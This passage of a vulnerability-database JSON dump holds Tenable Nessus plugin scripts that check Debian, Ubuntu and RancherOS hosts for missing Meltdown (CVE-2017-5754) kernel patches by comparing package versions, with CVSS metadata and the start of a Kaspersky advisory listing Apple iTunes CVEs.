This\nsolution might have a performance impact, and can be disabled at boot\ntime by passing pti=off to the kernel command line.\n\nWe also identified a regression for ancient userspaces using the\nvsyscall interface, for example chroot and containers using (e)glibc\n2.13 and older, including those based on Debian 7 or RHEL/CentOS 6.\nThis regression will be fixed in a later update.\n\nThe other vulnerabilities (named Spectre) published at the same time\nare not addressed in this update and will be fixed in a later update.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/linux\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/linux\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4078\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the linux packages.\n\nFor the oldstable distribution (jessie), this problem will be fixed in\na separate update.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 4.9.65-3+deb9u2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/05\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"hyperv-daemons\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libcpupower-dev\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libcpupower1\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libusbip-dev\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-compiler-gcc-6-arm\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-compiler-gcc-6-s390\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-compiler-gcc-6-x86\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-cpupower\", 
reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-doc-4.9\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-4kc-malta\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-5kc-malta\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-686\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-686-pae\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-all\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-all-amd64\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-all-arm64\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-all-armel\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-all-armhf\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-all-i386\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-all-mips\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-all-mips64el\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-all-mipsel\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-all-ppc64el\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-all-s390x\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-amd64\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif 
(deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-arm64\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-armmp\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-armmp-lpae\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-common\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-common-rt\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-loongson-3\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-marvell\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-octeon\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-powerpc64le\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-rt-686-pae\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-rt-amd64\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-s390x\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-4kc-malta\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-4kc-malta-dbg\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-5kc-malta\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-5kc-malta-dbg\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-686\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", 
prefix:\"linux-image-4.9.0-9-686-dbg\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-686-pae\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-686-pae-dbg\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-amd64\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-amd64-dbg\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-arm64\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-arm64-dbg\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-armmp\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-armmp-dbg\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-armmp-lpae\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-armmp-lpae-dbg\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-loongson-3\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-loongson-3-dbg\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-marvell\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-marvell-dbg\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-octeon\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-octeon-dbg\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-powerpc64le\", 
reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-powerpc64le-dbg\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-rt-686-pae\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-rt-686-pae-dbg\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-rt-amd64\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-rt-amd64-dbg\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-s390x\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-s390x-dbg\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-kbuild-4.9\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-libc-dev\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-manual-4.9\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-perf-4.9\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-source-4.9\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-support-4.9.0-9\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"usbip\", reference:\"4.9.65-3+deb9u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-01-31T14:10:27", "description": "Jann Horn discovered that microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized memory reads via 
sidechannel attacks. This flaw is known as Meltdown. A local attacker could use this to expose sensitive information, including kernel memory.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.6, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2018-01-10T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS : linux vulnerability (USN-3524-1) (Meltdown)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2023-01-12T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-3524-1.NASL", "href": "https://www.tenable.com/plugins/nessus/105727", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin 
were\n# extracted from Ubuntu Security Notice USN-3524-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105727);\n script_version(\"3.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2017-5754\");\n script_xref(name:\"USN\", value:\"3524-1\");\n script_xref(name:\"IAVA\", value:\"2018-A-0019\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux vulnerability (USN-3524-1) (Meltdown)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Jann Horn discovered that microprocessors utilizing speculative\nexecution and indirect branch prediction may allow unauthorized memory\nreads via sidechannel attacks. This flaw is known as Meltdown. A local\nattacker could use this to expose sensitive information, including\nkernel memory.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3524-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/10\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu 
Security Notice (C) 2018-2023 Canonical, Inc. / NASL script (C) 2018-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-5754\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3524-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-139-generic\", pkgver:\"3.13.0-139.188\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-139-lowlatency\", pkgver:\"3.13.0-139.188\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-generic\", pkgver:\"3.13.0.139.148\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-lowlatency\", pkgver:\"3.13.0.139.148\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n 
extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.13-generic / linux-image-3.13-lowlatency / etc\");\n}\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-01-31T15:02:46", "description": "The remote host is running a version of RancherOS that is prior to v1.1.3, hence is vulnerable to local privilege-escalation vulnerability. An attacker can exploit this issue to cause a denial-of-service condition.\n\nSystems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.6, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2019-12-19T00:00:00", "type": "nessus", "title": "RancherOS < 1.1.3 Information Disclosure", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2020-08-19T00:00:00", "cpe": ["cpe:/o:rancher:rancheros"], "id": "RANCHEROS_1_1_3.NASL", "href": 
"https://www.tenable.com/plugins/nessus/132250", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# @NOAGENT@\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132250);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/19\");\n\n script_cve_id(\"CVE-2017-5754\");\n script_bugtraq_id(102378);\n\n script_name(english:\"RancherOS < 1.1.3 Information Disclosure\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of RancherOS that is prior to\nv1.1.3, hence is vulnerable to local privilege-escalation vulnerability. \nAn attacker can exploit this issue to cause a denial-of-service condition.\n\nSystems with microprocessors utilizing speculative execution and\nindirect branch prediction may allow unauthorized disclosure of\ninformation to an attacker with local user access via a side-channel\nanalysis of the data cache.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://rancher.com/docs/os/v1.x/en/about/security/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/rancher/os/releases/tag/v1.1.3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to RancherOS v1.1.3 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5754\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", 
value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:rancher:rancheros\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint_linux_distro.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RancherOS/version\", \"Host/RancherOS\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\n# Fix version is v1.1.3\nfix_version = '1.1.3';\nos = get_kb_item('Host/RancherOS');\n\nif (!os) audit(AUDIT_OS_NOT, 'RancherOS');\n\nos_ver = get_kb_item('Host/RancherOS/version');\nif (!os_ver)\n{\n exit(1, 'Could not determine the RancherOS version');\n}\n\nmatch = pregmatch(pattern:\"v([0-9\\.]+)\", string:os_ver);\n\nif (!isnull(match))\n{ \n version = match[1]; \n if (ver_compare(ver:version, fix:fix_version, strict:TRUE) == -1)\n {\n security_report_v4(\n port:0,\n severity:SECURITY_WARNING,\n extra:\n '\\n Installed version : ' + os_ver +\n '\\n Fixed version : v' + fix_version +\n '\\n'\n );\n }\n}\n\naudit(AUDIT_INST_VER_NOT_VULN, 'RancherOS', os_ver);", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}], "kaspersky": [{"lastseen": "2021-08-18T11:13:02", "description": "### *Detect date*:\n12/06/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Apple iTunes. 
Malicious users can exploit these vulnerabilities to execute arbitrary code and obtain sensitive information.\n\n### *Affected products*:\nApple iTunes earlier than 12.7.2\n\n### *Solution*:\nUpdate to latest version \n[Download iTunes](<https://www.apple.com/itunes/download/>)\n\n### *Original advisories*:\n[About the security content of iTunes 12.7.2 for Windows](<https://support.apple.com/en-us/HT208326>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Apple iTunes](<https://threats.kaspersky.com/en/product/Apple-iTunes/>)\n\n### *CVE-IDS*:\n[CVE-2017-15422](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15422>)4.3Warning \n[CVE-2017-7165](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7165>)6.8High \n[CVE-2017-13870](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13870>)6.8High \n[CVE-2017-7172](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7172>)9.3Critical \n[CVE-2017-13884](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13884>)6.8High \n[CVE-2017-13885](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13885>)6.8High \n[CVE-2017-7156](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7156>)6.8High \n[CVE-2017-7157](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7157>)6.8High \n[CVE-2017-13856](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13856>)6.8High \n[CVE-2017-7160](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7160>)6.8High \n[CVE-2017-13864](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13864>)4.3Warning \n[CVE-2017-7153](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7153>)5.8High \n[CVE-2017-13866](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13866>)6.8High", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, 
